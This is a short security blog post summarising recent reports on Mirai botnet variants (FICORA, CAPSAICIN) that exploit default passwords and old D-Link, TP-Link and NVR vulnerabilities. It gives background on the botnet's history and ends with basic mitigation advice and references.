Image generated by DALLE-3
Mirai Botnet Variant Resurgence
Nicholas Howland, December 27th 2024
A couple headlines about a resurgence in the Mirai botnet caught my eye, for my last post of the year I wanted to look at a couple of these articles and ended up uncovering a couple of way older posts about botnets, super interesting if you want to learn a few tidbits about the history of some of the botnet varients. Vincent Li's article is very helpful if you need some IOC's for threat hunting in your environment.
Before we get to the botnets
I wanted to share some good news for healthcare security. A proposal to update the Security Rule for HIPAA was sent to through the Office for Civil Rights, it aims to improve cybersecurity and better protect healthcare organizations. This means that the security rule, which was updated last in 2013, will be updated which will hopefully reduce risk to patents and providers alike from well botnets but a lot of other nasty stuff like ransomware, data breaches etc...
The full press release by HHS can be found here: https://www.hhs.gov/about/news/2024/12/27/hhs-office-civil-rights-proposes-measures-strengthen-cybersecurity-health-care-under-hipaa.html
What is Mirai
The Mirai botnet was identified on January 18th, 2017 by Brian Krebs in a blog post [1] as being created and operated by Paras Jha and Josiah White who owned a company Protraf Solutions. They were racketeering by offering to sell DDoS mitigations to companies that they would target with the botnet [2]. Mirai uses a couple different methods to deny the victim from providing services; through UDP floods, overwhelming DNS servers that resolve names to victim resources, SYN flooding, a Simple Text Oriented Messaging Protocol (STOMP) attack which attempts to use common protocols to hide the traffic from WAF appliances, GRE tunnel source obfuscation, HTTP flooding [3].
How does Mirai work
Mirai will compromise devices that have default passwords are are accessible from the open internet. Once the bot gains access to a device it will replicate itself by installing the software onto the compromised host. Once it is installed it will receive commands from a command and control server to either search for more potential bots running the ARC processor, or preform DDoS attacks.
Usual Suspects
The Hacker News reported on December 19th 2024 that Juniper, an enterprise network equipment company, stated that their customers had reported anomalous behavior from their Session Smart Network platforms which were identified as being compromised by a Mirai botnet [4]. The original article from Juniper Networks can be found in the references section [Juniper]. The devices infected were using the default credentials which is likely how they were first compromised.
Bleeping Computer on December 24rth 2024 that a new botnet began exploiting vulnerabilities in DigiEver Network Video Recording (NVR) equipment and TP-Link routers [5]. NVRs are often directly accessible to the internet which makes them a common service that is exposed to the internet. Earlier reporting by Bleeping computer over a month prior showed that the Shadow Server Foundation had discovered that a 0Day exploit (CVE-2024-11120) was being leveraged by botnets to infect GeoVision devices which are NVR/Video Surveillance systems [6]. In the same article [5] from Bleeping Computer, TP-Link routers that were using outdated firmware were also found to be being infected by the botnet.
Variants
The Hacker News reported [7] on a release by Fortinet [8], another network device manufacturer, that two new variants they call CAPSAICIN and FICORA were seen to be spreading themselves across vulnerable D-Link routers. Vincent Li in his post for Fortinet explained "These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the HNAP (Home Network Administration Protocol) interface. This HNAP weakness was first exposed almost a decade ago, with numerous devices affected by a variety of CVE numbers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112."
CAPSAICIN and FICORA operation
From Vincent Li's post; FICORA infects devices by downloading a shell script that uses
wget, ftpget, curl, and tftp to retrieve binaries. Then
kills off processes of other botnets that may be running on the device. Once other processes that may interfere
are no longer running then it executes the binaries using many different architectures such as "arc," "arm,"
"arm5," "arm6," "arm7," "i486," "i586," "i686," "m68k," "mips," "mipsel," "powerpc," "powerpc-440fp," and
"sparc."
CAPSAICIN uses the same methodology as FICORA except that it prefixes its binaries with
yakuza instead off la.bot. Vincent Li also made the remark that the CAPSAICIN botnet
seems to be a variant of the Keksec botnet which was also known to target vulnerable routers and IoT devices but
mainly focused on Realtek and Linksys endpoints [9].
Just like Miari the credentials used to attempt to compromise other vulnerable or accessible devices are hard coded into the binary. It also employs different DDoS attack functions using UDP, TCP, and DNS just like Miari.
Mitigations
A full list of Indicators of Compromise can be found at the bottom of the blogpost by Vincent Li, https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
There are a few things you can do to stop a botnet from infecting your router, first make it more difficult to infect by changing the default administrator password, disallowing access to systems from the internet or at least only allowing access by a few trusted IP addresses, and finally applying patches.
If you are a victim of a DDoS attack, load balancers and companies like Cloudflare have excellent solutions. Cloudflare, unlike Paras Jha and Josiah White, regularly contribute to helping protect systems from attack by using load balancing in order to distribute traffic to your website or websites, they also actively stop DDoS attacks and alert you when you may be under attack.
References
[1] Brian Krebs, Krebs On Security, January 18, 2017, https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/
[2] Cloudflare, retrieved on December 27th 2024, https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/
[3] Elizabeth Montalbano, Contributing Writer for Dark Reading, August 16, 2023 https://www.darkreading.com/cyberattacks-data-breaches/mirai-common-attack-methods-remain-consistent-effective
[4]Ravie Lakshmanan, The Hacker News, December 19th 2024, https://thehackernews.com/2024/12/juniper-warns-of-mirai-botnet-targeting.html
[Juniper] Juniper Blogs, Created 2024-12-17 Last Updated 2024-12-23 https://supportportal.juniper.net/s/article/2024-12-Reference-Advisory-Session-Smart-Router-Mirai-malware-found-on-systems-when-the-default-password-remains-unchanged?language=en_US
[5] Bill Toulas, Bleeping Computer, December 24, 2024 https://www.bleepingcomputer.com/news/security/new-botnet-exploits-vulnerabilities-in-nvrs-tp-link-routers/
[6] Bill Toulas, Bleeping Computer, November 15, 2024 https://www.bleepingcomputer.com/news/security/botnet-exploits-geovision-zero-day-to-install-mirai-malware/
[7] Ravie Lakshmanan, Dec 27th, 2024, The Hacker News, https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
[8] Vincent Li, Fortinet, December 26, 2024 https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
[9] Tara Seals, May 19th 2021, Threat Post https://threatpost.com/keksec-simps-botnet-gaming-ddos/166306/